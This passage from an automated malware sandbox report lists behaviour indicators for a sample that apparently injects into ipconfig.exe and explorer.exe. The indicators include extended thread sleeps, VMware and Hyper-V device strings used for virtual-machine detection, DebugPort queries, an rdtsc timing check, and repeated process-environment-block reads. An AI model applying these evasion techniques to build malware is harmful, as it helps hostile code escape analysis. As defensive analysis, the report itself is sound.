              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172Thread sleep time: -272000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172Thread sleep count: 9833 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172Thread sleep time: -19666000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: explorer.exe, 00000002.00000000.2005546585.000000000C669000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_p
              Source: explorer.exe, 00000002.00000002.4449747928.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
              Source: explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
              Source: explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
              Source: explorer.exe, 00000002.00000002.4449747928.0000000007637000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAZ
              Source: explorer.exe, 00000002.00000002.4449747928.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
              Source: explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.1994801802.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE9AB0 rdtsc 0_2_00CE9AB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CEACF0 LdrLoadDll,0_2_00CEACF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01824180 mov eax, dword ptr fs:[00000030h]0_2_01824180
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01824180 mov eax, dword ptr fs:[00000030h]0_2_01824180
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183C188 mov eax, dword ptr fs:[00000030h]0_2_0183C188
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183C188 mov eax, dword ptr fs:[00000030h]0_2_0183C188
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180019F mov eax, dword ptr fs:[00000030h]0_2_0180019F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180019F mov eax, dword ptr fs:[00000030h]0_2_0180019F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180019F mov eax, dword ptr fs:[00000030h]0_2_0180019F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180019F mov eax, dword ptr fs:[00000030h]0_2_0180019F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C156 mov eax, dword ptr fs:[00000030h]0_2_0177C156
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786154 mov eax, dword ptr fs:[00000030h]0_2_01786154
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786154 mov eax, dword ptr fs:[00000030h]0_2_01786154
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018461C3 mov eax, dword ptr fs:[00000030h]0_2_018461C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018461C3 mov eax, dword ptr fs:[00000030h]0_2_018461C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B0124 mov eax, dword ptr fs:[00000030h]0_2_017B0124
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018561E5 mov eax, dword ptr fs:[00000030h]0_2_018561E5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B01F8 mov eax, dword ptr fs:[00000030h]0_2_017B01F8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov ecx, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov ecx, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov ecx, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov eax, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E10E mov ecx, dword ptr fs:[00000030h]0_2_0182E10E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01840115 mov eax, dword ptr fs:[00000030h]0_2_01840115
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182A118 mov ecx, dword ptr fs:[00000030h]0_2_0182A118
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182A118 mov eax, dword ptr fs:[00000030h]0_2_0182A118
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182A118 mov eax, dword ptr fs:[00000030h]0_2_0182A118
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182A118 mov eax, dword ptr fs:[00000030h]0_2_0182A118
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE1D0 mov eax, dword ptr fs:[00000030h]0_2_017FE1D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE1D0 mov eax, dword ptr fs:[00000030h]0_2_017FE1D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE1D0 mov ecx, dword ptr fs:[00000030h]0_2_017FE1D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE1D0 mov eax, dword ptr fs:[00000030h]0_2_017FE1D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE1D0 mov eax, dword ptr fs:[00000030h]0_2_017FE1D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01814144 mov eax, dword ptr fs:[00000030h]0_2_01814144
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01814144 mov eax, dword ptr fs:[00000030h]0_2_01814144
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01814144 mov ecx, dword ptr fs:[00000030h]0_2_01814144
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01814144 mov eax, dword ptr fs:[00000030h]0_2_01814144
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01814144 mov eax, dword ptr fs:[00000030h]0_2_01814144
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01818158 mov eax, dword ptr fs:[00000030h]0_2_01818158
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A197 mov eax, dword ptr fs:[00000030h]0_2_0177A197
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A197 mov eax, dword ptr fs:[00000030h]0_2_0177A197
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A197 mov eax, dword ptr fs:[00000030h]0_2_0177A197
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C0185 mov eax, dword ptr fs:[00000030h]0_2_017C0185
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AC073 mov eax, dword ptr fs:[00000030h]0_2_017AC073
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782050 mov eax, dword ptr fs:[00000030h]0_2_01782050
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018180A8 mov eax, dword ptr fs:[00000030h]0_2_018180A8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018460B8 mov eax, dword ptr fs:[00000030h]0_2_018460B8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018460B8 mov ecx, dword ptr fs:[00000030h]0_2_018460B8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A020 mov eax, dword ptr fs:[00000030h]0_2_0177A020
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C020 mov eax, dword ptr fs:[00000030h]0_2_0177C020
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018020DE mov eax, dword ptr fs:[00000030h]0_2_018020DE
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018060E0 mov eax, dword ptr fs:[00000030h]0_2_018060E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E016 mov eax, dword ptr fs:[00000030h]0_2_0179E016
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E016 mov eax, dword ptr fs:[00000030h]0_2_0179E016
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E016 mov eax, dword ptr fs:[00000030h]0_2_0179E016
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E016 mov eax, dword ptr fs:[00000030h]0_2_0179E016
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01804000 mov ecx, dword ptr fs:[00000030h]0_2_01804000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01822000 mov eax, dword ptr fs:[00000030h]0_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C0F0 mov eax, dword ptr fs:[00000030h]0_2_0177C0F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C20F0 mov ecx, dword ptr fs:[00000030h]0_2_017C20F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017880E9 mov eax, dword ptr fs:[00000030h]0_2_017880E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0177A0E3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816030 mov eax, dword ptr fs:[00000030h]0_2_01816030
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806050 mov eax, dword ptr fs:[00000030h]0_2_01806050
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178208A mov eax, dword ptr fs:[00000030h]0_2_0178208A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018063C0 mov eax, dword ptr fs:[00000030h]0_2_018063C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183C3CD mov eax, dword ptr fs:[00000030h]0_2_0183C3CD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018243D4 mov eax, dword ptr fs:[00000030h]0_2_018243D4
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018243D4 mov eax, dword ptr fs:[00000030h]0_2_018243D4
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E3DB mov eax, dword ptr fs:[00000030h]0_2_0182E3DB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E3DB mov eax, dword ptr fs:[00000030h]0_2_0182E3DB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E3DB mov ecx, dword ptr fs:[00000030h]0_2_0182E3DB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182E3DB mov eax, dword ptr fs:[00000030h]0_2_0182E3DB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C310 mov ecx, dword ptr fs:[00000030h]0_2_0177C310
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A0310 mov ecx, dword ptr fs:[00000030h]0_2_017A0310
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA30B mov eax, dword ptr fs:[00000030h]0_2_017BA30B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA30B mov eax, dword ptr fs:[00000030h]0_2_017BA30B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA30B mov eax, dword ptr fs:[00000030h]0_2_017BA30B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B63FF mov eax, dword ptr fs:[00000030h]0_2_017B63FF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E3F0 mov eax, dword ptr fs:[00000030h]0_2_0179E3F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E3F0 mov eax, dword ptr fs:[00000030h]0_2_0179E3F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E3F0 mov eax, dword ptr fs:[00000030h]0_2_0179E3F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017903E9 mov eax, dword ptr fs:[00000030h]0_2_017903E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01828350 mov ecx, dword ptr fs:[00000030h]0_2_01828350
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184A352 mov eax, dword ptr fs:[00000030h]0_2_0184A352
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov ecx, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A438F mov eax, dword ptr fs:[00000030h]0_2_017A438F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A438F mov eax, dword ptr fs:[00000030h]0_2_017A438F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182437C mov eax, dword ptr fs:[00000030h]0_2_0182437C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177826B mov eax, dword ptr fs:[00000030h]0_2_0177826B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov ecx, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786259 mov eax, dword ptr fs:[00000030h]0_2_01786259
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177823B mov eax, dword ptr fs:[00000030h]0_2_0177823B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01808243 mov eax, dword ptr fs:[00000030h]0_2_01808243
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01808243 mov ecx, dword ptr fs:[00000030h]0_2_01808243
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902A0 mov eax, dword ptr fs:[00000030h]0_2_017902A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902A0 mov eax, dword ptr fs:[00000030h]0_2_017902A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
